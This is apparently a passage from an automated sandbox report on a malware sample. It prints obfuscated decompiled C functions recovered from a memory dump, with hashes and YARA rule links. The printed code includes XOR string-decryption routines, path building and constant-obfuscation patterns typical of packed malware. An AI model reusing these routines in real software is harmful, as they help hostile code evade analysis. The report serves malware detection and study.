				signed int _v52;
				signed int _v56;
				signed int _t130;
				short _t133;
				void* _t138;
				void* _t152;
				void* _t153;
				short* _t154;
				short* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t160;

				_v36 = 0xe64b99;
				_t152 =  *0x10025208 + 0x1c;
				_v36 = _v36 + 0xbeaa;
				_t138 = 0x6bddae1;
				_t156 = 0x4a;
				_v36 = _v36 / _t156;
				_v36 = _v36 ^ 0x0000d8f9;
				_v28 = 0x69a1f3;
				_v28 = _v28 ^ 0x12bcf255;
				_v28 = _v28 + 0x3abc;
				_v28 = _v28 ^ 0x12d44389;
				_v48 = 0x8b0e7b;
				_v48 = _v48 + 0xffffcedb;
				_v48 = _v48 ^ 0x008228a1;
				_v12 = 0xc5b078;
				_v12 = _v12 ^ 0x0734e8f3;
				_v12 = _v12 + 0xffff28df;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0x102a0a0a;
				_v32 = 0xc229a3;
				_v32 = _v32 + 0xffff1280;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x609cbc57;
				_v56 = 0xaa055b;
				_v56 = _v56 + 0x5308;
				_v56 = _v56 ^ 0x00a745e5;
				_v52 = 0x66f1f5;
				_t157 = 0x69;
				_v52 = _v52 * 0x1e;
				_v52 = _v52 ^ 0x0c1bc18e;
				_v8 = 0x5e8cac;
				_v8 = _v8 + 0xffff9ef8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 * 0x51;
				_v8 = _v8 ^ 0x0009b892;
				_v24 = 0x6f1c6e;
				_v24 = _v24 / _t157;
				_v24 = _v24 * 0x53;
				_v24 = _v24 ^ 0x0050d7ed;
				_v44 = 0x2caa1c;
				_v44 = _v44 | 0xb8215ac1;
				_v44 = _v44 ^ 0xb8247dfc;
				_v40 = 0xeaaeb5;
				_v40 = _v40 | 0xaf7d224c;
				_v40 = _v40 ^ 0xaff2dbb7;
				_v20 = 0x1baeff;
				_v20 = _v20 + 0xffff2118;
				_v20 = _v20 + 0xaa4b;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x0005e3c6;
				_v16 = 0x885448;
				_v16 = _v16 + 0xffff0821;
				_v16 = _v16 + 0x3c80;
				_v16 = _v16 * 0x7f;
				_v16 = _v16 ^ 0x4342ca47;
				do {
					while(_t138 != 0x6bddae1) {
						if(_t138 == 0x7c91e71) {
							_push(1);
							_push(3);
							_push(_v16);
							E10010204(_v20, _t152);
							 *((short*)(_t152 + 6)) = 0;
							return 0;
						}
						if(_t138 == 0x7cf636f) {
							_t130 = E10017E33(0x10, 4);
							_push(2);
							_push(1);
							_push(_v32);
							_t158 = _t130;
							E10010204(_v12, _t152);
							_push(1);
							_push(_t158);
							_push(_v52);
							_t153 = _t152 + 2;
							E10010204(_v56, _t153);
							_t160 = _t160 + 0x20;
							_t154 = _t153 + _t158 * 2;
							_t138 = 0xfb795a2;
							_t133 = 0x5c;
							 *_t154 = _t133;
							_t152 = _t154 + 2;
							continue;
						}
						if(_t138 != 0xfb795a2) {
							goto L8;
						}
						_t159 = E10017E33(0x10, 4);
						_push(1);
						_push(_t159);
						_push(_v40);
						E10010204(_v44, _t152);
						_t160 = _t160 + 0x14;
						_t155 = _t152 + _t159 * 2;
						_t138 = 0x7c91e71;
						_t133 = 0x2e;
						 *_t155 = _t133;
						_t152 = _t155 + 2;
					}
					E1000C0A4();
					_t138 = 0x7cf636f;
					L8:
				} while (_t138 != 0x540ba7);
				return _t133;
			}

0x10022eb4
0x10022ebb
0x10022ebe
0x10022ec5
0x10022ecf
0x10022ed4
0x10022ed9
0x10022ee0
0x10022ee7
0x10022eee
0x10022ef5
0x10022efc
0x10022f03
0x10022f0a
0x10022f11
0x10022f18
0x10022f1f
0x10022f26
0x10022f2a
0x10022f31
0x10022f38
0x10022f3f
0x10022f43
0x10022f4a
0x10022f51
0x10022f58
0x10022f5f
0x10022f6a
0x10022f6b
0x10022f6e
0x10022f75
0x10022f7c
0x10022f83
0x10022f8b
0x10022f8e
0x10022f95
0x10022fa1
0x10022fa8
0x10022fab
0x10022fb2
0x10022fb9
0x10022fc0
0x10022fc7
0x10022fce
0x10022fd5
0x10022fdc
0x10022fe3
0x10022fea
0x10022ff1
0x10022ff5
0x10022ffc
0x10023003
0x1002300a
0x10023015
0x10023018
0x1002301f
0x1002301f
0x10023031
0x100230eb
0x100230ed
0x100230ef
0x100230f7
0x10023101
0x00000000
0x10023101
0x1002303d
0x1002308c
0x10023091
0x10023093
0x10023095
0x1002309d
0x1002309f
0x100230a4
0x100230a6
0x100230a7
0x100230ad
0x100230b2
0x100230b7
0x100230ba
0x100230bd
0x100230c4
0x100230c5
0x100230c8
0x00000000
0x100230c8
0x10023045
0x00000000
0x00000000
0x1002305a
0x1002305e
0x10023060
0x10023061
0x10023067
0x1002306c
0x1002306f
0x10023072
0x10023079
0x1002307a
0x1002307d
0x1002307d
0x100230d3
0x100230d8
0x100230dd
0x100230dd
0x00000000

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22c353e73e006707814c6ac9d3b155f036ccadec4314ee912da937379027bd73
Instruction ID: d345a3861bf462173dccee29601f7c64205a0c1eea8eb03e90a45da1caa30a19
Opcode Fuzzy Hash: 22c353e73e006707814c6ac9d3b155f036ccadec4314ee912da937379027bd73
Instruction Fuzzy Hash: B46149B5E00319EBCF54CFA4D98A9DEBBB2FF44314F208049E615BA290D7B15A44CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1000FBF7, Relevance: .1, Instructions: 121
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1000FBF7() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				char* _t95;
				void* _t99;
				signed int _t112;
				short* _t113;
				signed int* _t116;

				_t116 =  &_v572;
				_v524 = _v524 & 0x00000000;
				_v536 = 0xc46616;
				_t99 = 0x6e301fa;
				_v532 = 0x575bc1;
				_v528 = 0xc6f7f;
				_v572 = 0x7f833;
				_v572 = _v572 << 7;
				_v572 = _v572 >> 9;
				_v572 = _v572 | 0xed38ec6d;
				_v572 = _v572 ^ 0xed3dfc20;
				_v568 = 0xa3e318;
				_v568 = _v568 + 0x6bd1;
				_v568 = _v568 * 0x19;
				_v568 = _v568 << 0xe;
				_v568 = _v568 ^ 0xed34baaf;
				_v560 = 0x9d4c1d;
				_v560 = _v560 ^ 0x55cc8c66;
				_t112 = 0x19;
				_v560 = _v560 * 0x33;
				_v560 = _v560 ^ 0xff4145c4;
				_v552 = 0x9bc2f4;
				_t113 = _v548;
				_v552 = _v552 / _t112;
				_v552 = _v552 + 0xffff5b0d;
				_v552 = _v552 ^ 0x000dce58;
				_v540 = 0xba89bb;
				_v540 = _v540 + 0xffffbab9;
				_v540 = _v540 >> 0xe;
				_v540 = _v540 ^ 0x0008d208;
				_v564 = 0xb51244;
				_v564 = _v564 >> 9;
				_v564 = _v564 + 0xffffd4b8;
				_v564 = _v564 + 0xffff4878;
				_v564 = _v564 ^ 0xfff09cb9;
				_v556 = 0xab0a4;
				_v556 = _v556 * 0x53;
				_v556 = _v556 * 0x50;
				_v556 = _v556 ^ 0x1545587b;
				_v544 = 0xa6e667;
				_v544 = _v544 << 5;
				_v544 = _v544 >> 9;
				_v544 = _v544 ^ 0x000c5bee;
				L1:
				while(_t99 != 0x414a109) {
					if(_t99 == 0x6e301fa) {
						_t99 = 0xa701bbd;
						continue;
					} else {
						if(_t99 == 0xa701bbd) {
							_t95 = E1001E780(_v572, __eflags, _v568,  &_v520);
							_t99 = 0xd521ffd;
							continue;
						} else {
							if(_t99 == 0xd521ffd) {
								_v548 = 0x16b9b7;
								_v548 = _v548 ^ 0xe6df851b;
								_v548 = _v548 ^ 0xe6c93cae;
								_t113 =  &_v520 + E100047C5(_v560, _v540,  &_v520) * 2;
								while(1) {
									_t95 =  &_v520;
									if(_t113 <= _t95) {
										break;
									}
									__eflags =  *_t113 - 0x5c;
									if( *_t113 != 0x5c) {
										L8:
										_t113 = _t113 - 2;
										__eflags = _t113;
										continue;
									} else {
										_t76 =  &_v548;
										 *_t76 = _v548 - 1;
										__eflags =  *_t76;
										if( *_t76 == 0) {
											__eflags = _t113;
										} else {
											goto L8;
										}
									}
									L12:
									_t99 = 0x414a109;
									goto L1;
								}
								goto L12;
							}
						}
					}
					L16:
					__eflags = _t99 - 0xbb03e70;
					if(__eflags != 0) {
						continue;
					}
					return _t95;
				}
				__eflags =  *0x10025208 + 0x1c;
				E1001DD9F(_v564, _t113, _v556,  *0x10025208 + 0x1c, _v544);
				_t116 =  &(_t116[3]);
				_t99 = 0xbb03e70;
				goto L16;
			}

0x1000fbf7
0x1000fbfd
0x1000fc04
0x1000fc0c
0x1000fc11
0x1000fc19
0x1000fc21
0x1000fc28
0x1000fc2c
0x1000fc30
0x1000fc37
0x1000fc3e
0x1000fc46
0x1000fc57
0x1000fc60
0x1000fc6a
0x1000fc77
0x1000fc7f
0x1000fc8e
0x1000fc8f
0x1000fc93
0x1000fc9b
0x1000fca9
0x1000fcad
0x1000fcb1
0x1000fcb9
0x1000fcc1
0x1000fcc9
0x1000fcd1
0x1000fcd6
0x1000fcde
0x1000fce6
0x1000fceb
0x1000fcf3
0x1000fcfb
0x1000fd03
0x1000fd10
0x1000fd19
0x1000fd1d
0x1000fd25
0x1000fd2d
0x1000fd32
0x1000fd37
0x00000000
0x1000fd3f
0x1000fd4d
0x1000fdd3
0x00000000
0x1000fd53
0x1000fd55
0x1000fdc5
0x1000fdcc
0x00000000
0x1000fd57
0x1000fd59
0x1000fd5f
0x1000fd6b
0x1000fd73
0x1000fd93
0x1000fda7
0x1000fda7
0x1000fdad
0x00000000
0x00000000
0x1000fd98
0x1000fd9c
0x1000fda4
0x1000fda4
0x1000fda4
0x00000000
0x1000fd9e
0x1000fd9e
0x1000fd9e
0x1000fd9e
0x1000fda2
0x1000fdb1
0x00000000
0x00000000
0x00000000
0x1000fda2
0x1000fdb4
0x1000fdb4
0x00000000
0x1000fdb4
0x00000000
0x1000fdaf
0x1000fd59
0x1000fd55
0x1000fdfe
0x1000fdfe
0x1000fe04
0x00000000
0x00000000
0x1000fe14
0x1000fe14
0x1000fde5
0x1000fdf1
0x1000fdf6
0x1000fdf9
0x00000000

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95c91a036a196069e25587d0953e5cf9fc7a617b5fea082acc49d13680bcfd1a
Instruction ID: 63fcd847b62d259026083bd47df6df8abd928d9bc887f807dc3c319a06b93445
Opcode Fuzzy Hash: 95c91a036a196069e25587d0953e5cf9fc7a617b5fea082acc49d13680bcfd1a
Instruction Fuzzy Hash: A65155724083018FD358DF24C58546FBBE1FB98798F504A1EE4D9A6260D3B58A4ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 1000416C, Relevance: .1, Instructions: 115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1000416C(void* __ecx, signed int* __edx) {
				void* _t67;
				signed int _t75;
				short* _t94;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				unsigned int _t105;
				unsigned int _t106;
				short* _t113;
				signed int* _t114;
				signed int* _t115;
				unsigned int _t118;
				void* _t124;
				short _t125;
				void* _t126;
				void* _t128;

				_push( *((intOrPtr*)(_t126 + 0x40)));
				_t116 = __edx;
				_push( *((intOrPtr*)(_t126 + 0x40)));
				_push( *((intOrPtr*)(_t126 + 0x40)));
				_push(__edx);
				E100167B8(_t67);
				 *((intOrPtr*)(_t126 + 0x3c)) = 0x1f53a5;
				_t5 = _t116 + 4; // 0x10001848
				_t114 = _t5;
				_t125 = 0;
				 *((intOrPtr*)(_t126 + 0x40)) = 0;
				 *((intOrPtr*)(_t126 + 0x44)) = 0;
				 *(_t126 + 0x30) = 0xb7d2ba;
				 *(_t126 + 0x30) =  *(_t126 + 0x30) + 0x75bc;
				 *(_t126 + 0x30) =  *(_t126 + 0x30) ^ 0x00b0ea18;
				 *(_t126 + 0x28) = 0xf284bf;
				_t97 = 0x47;
				 *(_t126 + 0x2c) =  *(_t126 + 0x28) * 0x7e;
				 *(_t126 + 0x2c) =  *(_t126 + 0x2c) ^ 0xbbc480a4;
				 *(_t126 + 0x2c) =  *(_t126 + 0x2c) + 0xffffeb47;
				 *(_t126 + 0x2c) =  *(_t126 + 0x2c) ^ 0xcc907e7b;
				 *(_t126 + 0x28) = 0x6ebc77;
				_t98 = 0x6a;
				 *(_t126 + 0x24) =  *(_t126 + 0x28) / _t97;
				 *(_t126 + 0x24) =  *(_t126 + 0x24) << 0xa;
				 *(_t126 + 0x24) =  *(_t126 + 0x24) / _t98;
				 *(_t126 + 0x24) =  *(_t126 + 0x24) ^ 0x000d1f59;
				 *(_t126 + 0x2c) = 0x8db0a0;
				 *(_t126 + 0x2c) =  *(_t126 + 0x2c) | 0x4bc9373a;
				 *(_t126 + 0x2c) =  *(_t126 + 0x2c) << 0xd;
				 *(_t126 + 0x2c) =  *(_t126 + 0x2c) ^ 0xb6f3dc93;
				_t99 =  *__edx;
				_t115 =  &(_t114[1]);
				_t75 =  *_t114 ^ _t99;
				 *(_t126 + 0x34) = _t99;
				 *(_t126 + 0x38) = _t75;
				_t48 = _t75 + 1; // 0xb
				_t117 = _t48;
				_t118 =  !=  ? (_t48 & 0xfffffffc) + 4 : _t48;
				_t94 = E100134E7(_t117 & 0x00000003, _t118 + _t118);
				_t128 = _t126 + 0x1c;
				 *((intOrPtr*)(_t128 + 0x1c)) = _t94;
				if(_t94 != 0) {
					_t113 = _t94;
					_t124 =  >  ? 0 :  &(_t115[_t118 >> 2]) - _t115 + 3 >> 2;
					if(_t124 != 0) {
						_t95 =  *(_t128 + 0x20);
						do {
							_t104 =  *_t115;
							_t58 =  &(_t115[1]); // 0x14e13908
							_t115 = _t58;
							_t105 = _t104 ^ _t95;
							 *_t113 = _t105 & 0x000000ff;
							_t113 = _t113 + 8;
							 *((short*)(_t113 - 6)) = _t105 >> 0x00000008 & 0x000000ff;
							_t106 = _t105 >> 0x10;
							_t125 = _t125 + 1;
							 *((short*)(_t113 - 4)) = _t106 & 0x000000ff;
							 *((short*)(_t113 - 2)) = _t106 >> 0x00000008 & 0x000000ff;
						} while (_t125 < _t124);
						_t94 =  *((intOrPtr*)(_t128 + 0x1c));
					}
					 *((short*)(_t94 +  *(_t128 + 0x24) * 2)) = 0;
				}
				return _t94;
			}

0x10004173
0x10004177
0x10004179
0x1000417d
0x10004181
0x10004183
0x10004188
0x10004190
0x10004190
0x10004193
0x10004197
0x1000419b
0x1000419f
0x100041a7
0x100041af
0x100041b7
0x100041c6
0x100041c9
0x100041cd
0x100041d5
0x100041dd
0x100041e5
0x100041f3
0x100041f4
0x100041fa
0x10004205
0x10004209
0x10004211
0x10004219
0x10004221
0x10004226
0x1000422e
0x10004232
0x10004235
0x10004237
0x1000423b
0x1000423f
0x1000423f
0x1000424f
0x1000426f
0x10004271
0x10004274
0x1000427a
0x10004281
0x10004292
0x10004297
0x10004299
0x1000429d
0x1000429d
0x1000429f
0x1000429f
0x100042a2
0x100042a7
0x100042af
0x100042b5
0x100042b9
0x100042c2
0x100042c3
0x100042ca
0x100042ce
0x100042d2
0x100042d2
0x100042dc
0x100042dc
0x100042e9

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 158b38a21b4dfa89b06d8ec34b9379535c22b39c44d91100b8cb5e675697f494
Instruction ID: 5f00a53fb688a7efdf8a63150c045cf1d6a5b5f4e58609cbe6159ce0b0e0baa0
Opcode Fuzzy Hash: 158b38a21b4dfa89b06d8ec34b9379535c22b39c44d91100b8cb5e675697f494
Instruction Fuzzy Hash: 99415872A083109FD318CF2AC48541BFBE1FF88758F414A2EF599A7250D775E905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 100202B3, Relevance: .1, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E100202B3(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int* _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t56;
				signed int _t60;
				signed int _t68;
				unsigned int _t72;
				signed int _t75;
				signed int _t77;
				void* _t83;
				signed int _t88;
				void* _t93;
				intOrPtr _t94;
				signed int* _t95;
				signed int* _t96;
				signed int* _t97;

				_t97 = _a8;
				_t95 = _a12;
				_push(_a16);
				_push(_t95);
				_push(_t97);
				_push(_a4);
				E100167B8(_t56);
				_v16 = 0xccc520;
				_t94 = 0;
				_v12 = 0x4191a3;
				_v8 = 0;
				_v4 = 0;
				_v28 = 0xd88a4e;
				_v28 = _v28 << 4;
				_v28 = _v28 ^ 0x0d876827;
				_v36 = 0xb74056;
				_t77 = 0xc;
				_v36 = _v36 / _t77;
				_v36 = _v36 << 0xb;
				_v36 = _v36 << 0xb;
				_v36 = _v36 ^ 0x5705d201;
				_v32 = 0x6032bd;
				_v32 = _v32 | 0x1e30b6f9;
				_v32 = _v32 ^ 0x1e78c63b;
				_a12 = 0xf95385;
				_a12 = _a12 ^ 0xe2050149;
				_a12 = _a12 | 0x6742991e;
				_a12 = _a12 + 0xffffc42d;
				_a12 = _a12 ^ 0xe7f4b397;
				_t60 =  *_t95;
				_t96 =  &(_t95[2]);
				_t88 = _t95[1] ^ _t60;
				_v24 = _t60;
				_v20 = _t88;
				_t72 =  !=  ? (_t88 & 0xfffffffc) + 4 : _t88;
				_t68 = E100134E7(_t88 & 0x00000003, _t72);
				_a12 = _t68;
				if(_t68 != 0) {
					_t93 =  >  ? 0 :  &(_t96[_t72 >> 2]) - _t96 + 3 >> 2;
					if(_t93 != 0) {
						_t75 = _v24;
						_t83 = _t68 - _t96;
						do {
							_t94 = _t94 + 1;
							 *(_t83 + _t96) =  *_t96 ^ _t75;
							_t96 =  &(_t96[1]);
						} while (_t94 < _t93);
						_t68 = _a12;
					}
					if(_t97 != 0) {
						 *_t97 = _v20;
						return _t68;
					}
				}
				return _t68;
			}

0x100202b8
0x100202bd
0x100202c2
0x100202c6
0x100202c7
0x100202c8
0x100202ce
0x100202d3
0x100202db
0x100202dd
0x100202e7
0x100202eb
0x100202ef
0x100202f7
0x100202fc
0x10020304
0x10020312
0x10020315
0x10020319
0x1002031e
0x10020323
0x1002032b
0x10020333
0x1002033b
0x10020343
0x1002034b
0x10020353
0x1002035b
0x10020363
0x1002036b
0x10020370
0x10020373
0x10020375
0x1002037b
0x1002038c
0x100203a4
0x100203ac
0x100203b2
0x100203c8
0x100203cd
0x100203cf
0x100203d5
0x100203d7
0x100203db
0x100203dc
0x100203df
0x100203e2
0x100203e6
0x100203e6
0x100203ec
0x100203f2
0x00000000
0x100203f2
0x100203ec
0x100203fc

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 186dbba95939a63d7abc1cb47548576811f614e1c011e37abb50aec06a80809f
Instruction ID: 7f96022427c18712c16928f7842c073af53ec8868c9347c40af814cd3793d4ee
Opcode Fuzzy Hash: 186dbba95939a63d7abc1cb47548576811f614e1c011e37abb50aec06a80809f
Instruction Fuzzy Hash: E53157B16083409FC358CF69C88594BFBE5EFC8358F508A2DF69A93260D7B2D945CB02

Uniqueness

Uniqueness Score: -1.00%

Function 1000BC07, Relevance: .1, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1000BC07(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				void* _t67;
				signed int _t71;
				signed int _t72;
				void* _t74;
				void* _t82;
				void* _t83;
				unsigned int* _t85;

				_t74 = __ecx;
				_t85 =  &_v28;
				_v28 = 0x263d4;
				_v28 = _v28 >> 0xf;
				_v28 = _v28 + 0x422e;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x0005e0f5;
				_v4 = 0x1c9ba8;
				_v4 = _v4 * 0x39;
				_v4 = _v4 ^ 0x065861c6;
				_t82 = 0;
				_v20 = 0xdfd5bf;
				_t83 = 0x28fc7b;
				_v20 = _v20 ^ 0x43897631;
				_v20 = _v20 + 0xffff9241;
				_v20 = _v20 ^ 0x435f8413;
				_v8 = 0x965710;
				_v8 = _v8 + 0x33ff;
				_v8 = _v8 | 0xa727cfd8;
				_v8 = _v8 ^ 0xa7ba2f59;
				_v12 = 0x9ff836;
				_t71 = 0x30;
				_v12 = _v12 / _t71;
				_v12 = _v12 ^ 0x9d6a8f05;
				_v12 = _v12 ^ 0x9d662d63;
				_v16 = 0x306aa7;
				_v16 = _v16 + 0xc265;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 ^ 0x000e80c2;
				_v24 = 0xee0454;
				_t72 = 0x33;
				_v24 = _v24 / _t72;
				_v24 = _v24 + 0xd9c7;
				_v24 = _v24 >> 3;
				_v24 = _v24 ^ 0x000f3884;
				do {
					while(_t83 != 0x28fc7b) {
						if(_t83 == 0x1a823a8) {
							_push(_t74);
							_push(_t74);
							_t67 = E1000B8B0();
							_t85 =  &(_t85[2]);
							_t83 = 0xf929580;
							_t82 = _t82 + _t67;
							continue;
						} else {
							if(_t83 != 0xf929580) {
								goto L8;
							} else {
								_t82 = _t82 + E10004930(_v8, _v12, _v16, _v24, _t74 + 4);
							}
						}
						L5:
						return _t82;
					}
					_t83 = 0x1a823a8;
					L8:
				} while (_t83 != 0x5bd1aaf);
				goto L5;
			}

0x1000bc07
0x1000bc07
0x1000bc0a
0x1000bc13
0x1000bc17
0x1000bc1e
0x1000bc22
0x1000bc29
0x1000bc3a
0x1000bc43
0x1000bc4b
0x1000bc4d
0x1000bc55
0x1000bc57
0x1000bc5f
0x1000bc67
0x1000bc6f
0x1000bc77
0x1000bc7f
0x1000bc87
0x1000bc8f
0x1000bc9d
0x1000bca2
0x1000bca6
0x1000bcae
0x1000bcb6
0x1000bcbe
0x1000bcc6
0x1000bccb
0x1000bcd3
0x1000bce1
0x1000bcee
0x1000bcf2
0x1000bcfa
0x1000bcff
0x1000bd07
0x1000bd07
0x1000bd0d
0x1000bd47
0x1000bd48
0x1000bd49
0x1000bd4e
0x1000bd51
0x1000bd53
0x00000000
0x1000bd0f
0x1000bd11
0x00000000
0x1000bd13
0x1000bd2f
0x1000bd2f
0x1000bd11
0x1000bd31
0x1000bd3a
0x1000bd3a
0x1000bd57
0x1000bd59
0x1000bd59
0x00000000

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e89d77bbbc120d20bbff0f26d95a233a18b840f53babe9a4fd710868888675cb
Instruction ID: 582aafbc286b3779b1d43f56f4a80686fa2628cf595e3fea976d2997b71f34f4
Opcode Fuzzy Hash: e89d77bbbc120d20bbff0f26d95a233a18b840f53babe9a4fd710868888675cb
Instruction Fuzzy Hash: 573169725083418FD354DF25D58541BFBE0FBD8798F110A2DF8C8A6225E3B99A49CB93

Uniqueness

Uniqueness Score: -1.00%

Function 10010C2F, Relevance: .1, Instructions: 82
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E10010C2F(unsigned int __ecx, void* __edx) {
				void* _t50;
				unsigned int _t57;
				unsigned int _t60;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				unsigned int* _t71;
				unsigned int _t78;
				unsigned int _t79;
				void* _t80;
				char* _t81;
				signed int _t83;
				void* _t85;
				void* _t86;

				_t81 =  *((intOrPtr*)(_t85 + 0x2c));
				_push(_t81);
				_push( *(_t85 + 0x30));
				_t79 = __ecx;
				_push(__ecx);
				E100167B8(_t50);
				 *(_t85 + 0x30) =  *(_t85 + 0x30) & 0x00000000;
				_t86 = _t85 + 0x10;
				 *(_t86 + 0x24) =  *(_t86 + 0x24) & 0x00000000;
				 *((intOrPtr*)(_t86 + 0x18)) = 0x7bc2a3;
				 *((intOrPtr*)(_t86 + 0x1c)) = 0xd25123;
				 *(_t86 + 0x30) = 0x90ffec;
				 *(_t86 + 0x30) =  *(_t86 + 0x30) ^ 0x5aaec37a;
				 *(_t86 + 0x30) =  *(_t86 + 0x30) + 0xffff5633;
				 *(_t86 + 0x30) =  *(_t86 + 0x30) + 0xffff280e;
				 *(_t86 + 0x30) =  *(_t86 + 0x30) ^ 0x5a381949;
				 *(_t86 + 0x10) = 0x2ac620;
				 *(_t86 + 0x10) =  *(_t86 + 0x10) >> 0xa;
				 *(_t86 + 0x10) =  *(_t86 + 0x10) ^ 0x000e5288;
				 *(_t86 + 0xc) = 0x4e1843;
				_t67 = 0x67;
				 *(_t86 + 0x10) =  *(_t86 + 0xc) / _t67;
				_t68 = 0x68;
				_t65 = __ecx >> 2;
				 *(_t86 + 0xc) =  *(_t86 + 0x10) / _t68;
				 *(_t86 + 0xc) =  *(_t86 + 0xc) + 0x56b1;
				 *(_t86 + 0xc) =  *(_t86 + 0xc) ^ 0x0008269d;
				 *(_t86 + 0x14) = 0x5d8102;
				 *(_t86 + 0x14) =  *(_t86 + 0x14) + 0xffffcdc3;
				 *(_t86 + 0x14) =  *(_t86 + 0x14) ^ 0x005765f4;
				if(_t65 != 0) {
					_t83 = _t65;
					do {
						 *_t81 = E1000E14C();
						_t81 = _t81 + 4;
						_t83 = _t83 - 1;
					} while (_t83 != 0);
				}
				_t57 = _t65 << 2;
				_t80 = _t79 - _t57;
				if(_t80 != 0) {
					_t57 = E1000E14C();
					_t78 = _t57 >> 0x10;
					 *_t81 = _t78 >> 8;
					_t71 = _t81 + 1;
					if(_t80 > 1) {
						 *_t71 = _t78;
						_t71 =  &(_t71[0]);
					}
					if(_t80 > 2) {
						_t60 = _t57 >> 8;
						 *_t71 = _t60;
						return _t60;
					}
				}
				return _t57;
			}

0x10010c34
0x10010c39
0x10010c3a
0x10010c3e
0x10010c41
0x10010c42
0x10010c47
0x10010c4c
0x10010c4f
0x10010c56
0x10010c60
0x10010c68
0x10010c70
0x10010c78
0x10010c80
0x10010c88
0x10010c90
0x10010c98
0x10010c9d
0x10010ca5
0x10010cb3
0x10010cb8
0x10010cc2
0x10010cc5
0x10010cc8
0x10010ccc
0x10010cd4
0x10010cdc
0x10010ce4
0x10010cec
0x10010cf6
0x10010cf9
0x10010cfb
0x10010d08
0x10010d0a
0x10010d0d
0x10010d0d
0x10010d10
0x10010d13
0x10010d16
0x10010d18
0x10010d22
0x10010d29
0x10010d31
0x10010d33
0x10010d39
0x10010d3b
0x10010d3d
0x10010d3d
0x10010d41
0x10010d43
0x10010d46
0x00000000
0x10010d46
0x10010d41
0x10010d4e

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95c974673a8705e16b17671baba141f156959fb147872fdc94b89ff1774674c6
Instruction ID: 56298a727908825c4828e54ffcd92a36212c8cb0b2b06afc63de137d91971351
Opcode Fuzzy Hash: 95c974673a8705e16b17671baba141f156959fb147872fdc94b89ff1774674c6
Instruction Fuzzy Hash: 2131ABB1A083429FD344CF69D84990FBBE1FBD1764F808A1DF4D49A241D7B4E949CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1001177E, Relevance: .1, Instructions: 78
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E1001177E(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _t79;
				intOrPtr _t89;
				signed int _t91;
				signed int _t92;
				void* _t102;

				_push(_a8);
				_t102 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t79);
				_v36 = _v36 & 0x00000000;
				_v44 = 0x9f761a;
				_v40 = 0x1b4c30;
				_v8 = 0x60ff2c;
				_t91 = 0x72;
				_v8 = _v8 * 0x4c;
				_v8 = _v8 << 5;
				_v8 = _v8 + 0xffff06fc;
				_v8 = _v8 ^ 0x997500e7;
				_v28 = 0x3c3fcc;
				_v28 = _v28 + 0xffff8fbf;
				_v28 = _v28 ^ 0x0037f839;
				_v20 = 0xc405a3;
				_t92 = 0x33;
				_v20 = _v20 / _t91;
				_v20 = _v20 * 0x49;
				_v20 = _v20 ^ 0x0071b360;
				_v24 = 0xa659b2;
				_v24 = _v24 + 0xd34;
				_v24 = _v24 << 1;
				_v24 = _v24 ^ 0x014256dd;
				_v32 = 0xa072df;
				_v32 = _v32 + 0xffff2bf3;
				_v32 = _v32 ^ 0x0094003f;
				_v16 = 0x472d03;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 + 0xffff18f7;
				_v16 = _v16 | 0x5539e1f7;
				_v16 = _v16 ^ 0xfff5701a;
				_v12 = 0x7dccea;
				_v12 = _v12 ^ 0x37cc0146;
				_v12 = _v12 / _t92;
				_v12 = _v12 << 3;
